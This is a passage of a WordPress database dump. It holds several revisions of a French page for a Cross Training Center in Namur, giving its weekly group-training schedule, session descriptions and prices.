(474, 1, '2015-04-21 08:52:06', '2015-04-21 08:52:06', '\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-04-21 08:52:06', '2015-04-21 08:52:06', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(473, 1, '2015-04-21 08:51:37', '2015-04-21 08:51:37', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-04-21 08:51:37', '2015-04-21 08:51:37', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(468, 1, '2014-12-15 19:45:31', '2014-12-15 19:45:31', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:45:31', '2014-12-15 19:45:31', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(472, 1, '2015-04-21 08:50:51', '2015-04-21 08:50:51', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 